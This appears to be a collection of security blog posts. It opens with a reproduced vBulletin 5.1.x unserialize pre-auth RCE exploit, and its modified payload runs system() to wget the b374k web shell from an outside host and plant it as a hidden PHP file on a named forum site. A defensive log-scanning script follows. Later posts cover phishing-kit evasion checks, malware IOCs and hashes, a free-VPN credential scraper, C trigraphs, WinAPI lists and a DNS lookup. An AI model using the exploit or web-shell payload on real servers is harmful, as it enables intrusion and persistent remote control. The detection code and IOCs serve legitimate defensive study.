Vbulletin 5.X.X RCE Exploit

So, it has been all over the news: remote code execution in vBulletin forums due to an unserialize() call on attacker-controlled input.

“vBulletin 5.1.x – PreAuth 0day Remote Code Execution Exploit”

# Exploit Title: Vbulletin 5.1.X unserialize 0day preauth RCE exploit
# Date: Nov 4th, 2015
# Exploit Author: hhjj
# Vendor Homepage: http://www.vbulletin.com/
# Version: 5.1.x
# Tested on: Debian
# CVE : 
# I did not discover this exploit, leaked from the IoT.
 
# Build the object
php << 'eof'
<?php
class vB_Database {
       public $functions = array();
 
       public function __construct() 
       {
               $this->functions['free_result'] = 'phpinfo';
       }
}
 
class vB_dB_Result {
       protected $db;
       protected $recordset;
 
       public function __construct()
       {
               $this->db = new vB_Database();
               $this->recordset = 1;
       }
}
 
print urlencode(serialize(new vB_dB_Result())) . "\n";
eof
O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D
 
#Then hit decodeArguments with your payload :
http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D

The PoC shared in the original post does not actually execute commands on the web server (it only triggers phpinfo). The following payload does execute commands on the web server.

http:/osssd.com/forums/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A{s%3A5%3A%22%00*%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A{s%3A9%3A%22functions%22%3Ba%3A1%3A{s%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B}}s%3A12%3A%22%00*%00recordset%22%3Bs%3A85%3A%22system%28%22wget+https://b374k-shell.googlecode.com/files/b374k-2.8.php+-O+.jlsabse.php%22%29%22%3B}

The above payload would "wget" the file and save it as ".jlsabse.php" in the forum's main directory.
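As an added defensive example (not part of the original post or of the leaked exploit), the script below scans Apache-style access log lines for requests to the decodeArguments endpoint and flags any whose arguments parameter carries a serialized PHP object, which is exactly what the gadget chain above depends on. The log lines, IP addresses and user agents are constructed; the second line reuses the phpinfo payload shown above.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed Apache combined-format log lines; addresses are documentation ranges, not real hosts.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Nov/2015:10:12:01 +0000] "GET /vbforum/forum/general HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [04/Nov/2015:10:12:05 +0000] "GET /vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D HTTP/1.1" 200 910 "-" "python-requests/2.8.1"
203.0.113.9 - - [04/Nov/2015:10:12:09 +0000] "GET /vbforum/ajax/api/hook/decodeArguments?arguments=a%3A1%3A%7Bi%3A0%3Bs%3A2%3A%22hi%22%3B%7D HTTP/1.1" 200 40 "-" "curl/7.45.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A serialized PHP object looks like O:<len>:"<class>":...; only objects can reach
# __destruct/__wakeup gadgets such as the vB_dB_Result/vB_Database chain above.
OBJ_RE = re.compile(r'O:\d+:"([A-Za-z0-9_\\]+)"')
ENDPOINT = "/ajax/api/hook/decodeArguments"


def query_param(query, name):
    """Return the URL-decoded value of one query parameter (first occurrence)."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote_plus(value)
    return ""


def classify(line):
    """Return a finding dict for a decodeArguments request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith(ENDPOINT):
        return None
    classes = OBJ_RE.findall(query_param(parts.query, "arguments"))
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "status": m.group("status"),
        "classes": classes,
        # Any object reaching unserialize() here is an exploitation attempt, not normal use.
        "severity": "high" if classes else "info",
    }


def scan(log_text):
    """Scan a whole log and return the findings in order."""
    return [f for f in (classify(l) for l in log_text.splitlines()) if f]
```

Running scan() over a real access_log gives one finding per request to the endpoint; a "high" finding with a 200 status is the case to escalate.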
Thanks.

DROPBOX Phishing page accepts credentials with Blacklist check

Recently, while monitoring data collected via open-source threat intelligence, I stumbled upon a compromised website hosting a Dropbox phishing page.

It is a known thing in the market: whenever or wherever you see a phishing page, what is the first name that pops up in your mind? "NIGERIA". (PS: I am not racially/ethnically discriminating against anyone. If anyone feels offended, I apologize for the same.)

After initial analysis of the web server's access_log, it was found that a user with IP address 197.211.53.15, which resolves to Lagos, Nigeria (check here for detailed geolocation about the user), used a web backdoor to upload the phishing page files.

Continuing to the interesting part of the phishing campaign analysis, in the files hosting the phishing page I stumbled upon the following checks used by the actual programmer of the page:

  • Detection of proxy IP address:
    $response = file_get_contents('http://www.shroomery.org/ythan/proxycheck.php?ip='.$v_ip, 0, $context);
  • Netcraft HTTP user agent deny:
    if ($v_agent == "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)") {
  • PhishTank referrer check:
    if(parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST) == 'phishtank.com'){

The phishing script further stores complete information about IP addresses, logs from victims, blacklisted IP addresses and total IP address visits in the following files:

  • accepted_visitors.txt
  • db_file.txt
  • denied_vistors.txt
  • ips.txt

Stay tuned for more reports regarding malware, exploits and phishing/spam campaigns.

Hangul Word Processor (HWP) Zero-Day possible ties to North Korean threat actors

Detailed research by FireEye: check here.

Malware sample from the compromise: VirusTotal HWP Zero-Day

File names used by the malware:
2015년도 추계학술대회 안내문.hwp
2015년도 추계학술대회 안내문.hwp
svchost.exe
test.hwp

At the time of writing this blog post, 13/56 malware engines were detecting the sample as Exploit.CVE-2015-6585.

IOCs for PageFair breach

More detailed information on the PageFair breach: Complete Information

Open-source research indicates the following are the IOCs (Indicators of Compromise):

Ref: AlienVault Pulse

Result from the online malware scanner malwr.com for the sample used in the PageFair breach.

File Details

FILE NAME adobe_flashplayer_7.exe
FILE SIZE 389120 bytes
FILE TYPE PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 d9b91aa8c66c4a701f5558bdca805eec
SHA1 6ad0393f506bc6e0a84f1325b3d75cca019c21bc
SHA256 fe086927ddd728af00d7a26a54ff87dbd1b96a2cb7ec46066f37be2093aca60f
SHA512 fe6555c677b91fb38ec7eaf5a68eb829f2ac683332f69f0ea8f6cbfaea8fa9c1ac4f9b55e6f484af3ef64919bc2b78e34ecec9aecd49c9a455b6df1658f14c96
CRC32 5F11D2D9
SSDEEP 6144:QtcYzIuNcRcpSWUnMu7ssc5HKi9QpIFiT+0PXBguTjmTwu1PznvIgE:OEuSxPYjKFpIFZ0fGCOwu1rvIgE

Ref: PageFair Breach Sample

Update on the PageFair breach malware:

@bartblaze on Twitter:

Malware served in #PageFair hack seems to be modified/cracked version of NanoCore RAT. Main purpose: coinminer. #malware <– #BreakingNews

Free VPN with AutoConnect Windows – Python Script(code)

In order to use the Python script below:
1) The BeautifulSoup Python module (bs4) and requests are required on the base system.
2) Create a PPTP-based VPN connection named 93.115.83.250.
3) On Linux this script will only print the ip - username - password fetched from http://freevpn.me/accounts.

# Grab Free VPN And AutoConnect Windows
# Author :- c0deman
# License :- Beerware
# Thanks : http://freevpn.me/accounts for free VPN account
import subprocess
import sys
import time

import requests
from bs4 import BeautifulSoup

# Name of the pre-created PPTP connection (see step 2 above).
VPN_NAME = "93.115.83.250"

try:
    url = "http://freevpn.me/accounts"
    r = requests.get(url, timeout=15)
    if r.status_code == 200:
        soup = BeautifulSoup(r.text, "html.parser")
        plandiv = soup.find("div", {"class": "plan"})
        getdata = plandiv.find_all("li")
        # Each <li> reads "Label: value"; keep only the value part.
        gotip = getdata[0].get_text().split(":")[1].strip()
        gotuser = getdata[1].get_text().split(":")[1].strip()
        gotpass = getdata[2].get_text().split(":")[1].strip()
        print(gotip + " - " + gotuser + " - " + gotpass)
        # startswith("win") rather than 'in': "darwin" also contains "win".
        if sys.platform.startswith("win"):
            print("Disconnecting all VPNs")
            subprocess.call(["rasdial", "/disconnect"])
            time.sleep(2)
            # Pass the arguments as a list: these values come from a remote web
            # page, so never splice them into a shell command string.
            subprocess.call(["rasdial", VPN_NAME, gotuser, gotpass, "/phone:" + gotip])
except Exception as e:
    print(e)

Trigraph Sequence C programming

In general you can use a question mark directly in a string. The \? escape sequence only exists because there are nine
special sequences of characters called trigraph sequences: three-character sequences that represent each
of the characters #, [, ], \, {, }, ^, |, and ~:

??= converts to #
??( converts to [
??) converts to ]
??/ converts to \
??< converts to {
??> converts to }
??' converts to ^
??! converts to |
??- converts to ~

Example:

printf("What??!\n");

The output produced by this statement, when the compiler performs trigraph replacement, will be:

What|

Note that GCC in its default GNU dialects only warns about trigraphs and leaves them untouched unless -trigraphs or a strict -std= mode such as -std=c99 is given, and C23 removes trigraphs from the language entirely.

Important Networking WINAPI list

DLL : ws2_32.dll
API LIST:

  • WSAStartup: Initiates use of the Winsock DLL by a process; without a successful WSAStartup call, the application or DLL cannot use any further Winsock functions.
  • socket: The socket function creates a socket that is bound to a specific transport service provider.
  • bind: The bind function may be used to bind to a raw or unconnected socket.
  • listen: The listen function places a socket in a state in which it is listening for an incoming connection.
  • accept: The accept function permits an incoming connection attempt on a socket.
  • connect: The connect function establishes a connection to a specified socket.
  • recv: The recv function receives data from a connected socket or a bound connectionless socket.
  • send: The send function sends data on a connected socket.
  • gethostbyname: The gethostbyname function retrieves host information corresponding to a host name from a host database.

DLL : Wininet.dll
API LIST:

  • InternetOpen: InternetOpen is the first WinINet function called by an application. It tells the Internet DLL to initialize internal data structures and prepare for future calls from the application.
  • InternetOpenUrl: Opens a resource specified by a complete FTP or HTTP URL.
  • InternetReadFile: Reads data from a handle opened by the InternetOpenUrl, FtpOpenFile, or HttpOpenRequest function.

Reference:-
MSDN

Find Nameservers of domain name – Python

In order to extract nameservers, MX and other DNS records of a domain name via Python, the 'dnspython' package is required.
If 'dnspython' is not installed on the system, it can be installed via 'pip'.

Downloading ‘dnspython’ package:

pip install dnspython

Code:

import dns.resolver

domain = 'google.com'
# resolve() replaces the deprecated query(); the second argument is the record type (NS, MX, A, ...).
nameservers = dns.resolver.resolve(domain, 'NS')
for data in nameservers:
    print(data)

Result :

ns1.google.com.
ns2.google.com.
ns4.google.com.
ns3.google.com.